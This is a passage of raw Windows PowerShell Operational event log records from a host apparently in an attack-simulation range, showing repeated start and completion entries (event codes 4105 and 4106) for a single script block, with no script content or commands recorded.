Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470786
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470785
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470784
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470783
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470782
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470781
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470780
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470779
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470778
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470777
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470776
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470775
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470774
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470773
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470772
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470771
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470770
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470769
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470768
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470767
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470766
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470765
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470764
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470763
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470762
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470761
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470760
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470759
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470758
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470757
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470756
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470755
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470754
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470753
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470752
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470751
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470750
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470749
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470748
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470747
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470746
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470745
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470744
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470743
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470742
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470741
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470740
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470739
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470738
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470737
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470736
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470735
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470734
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470733
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470732
Keywords=None
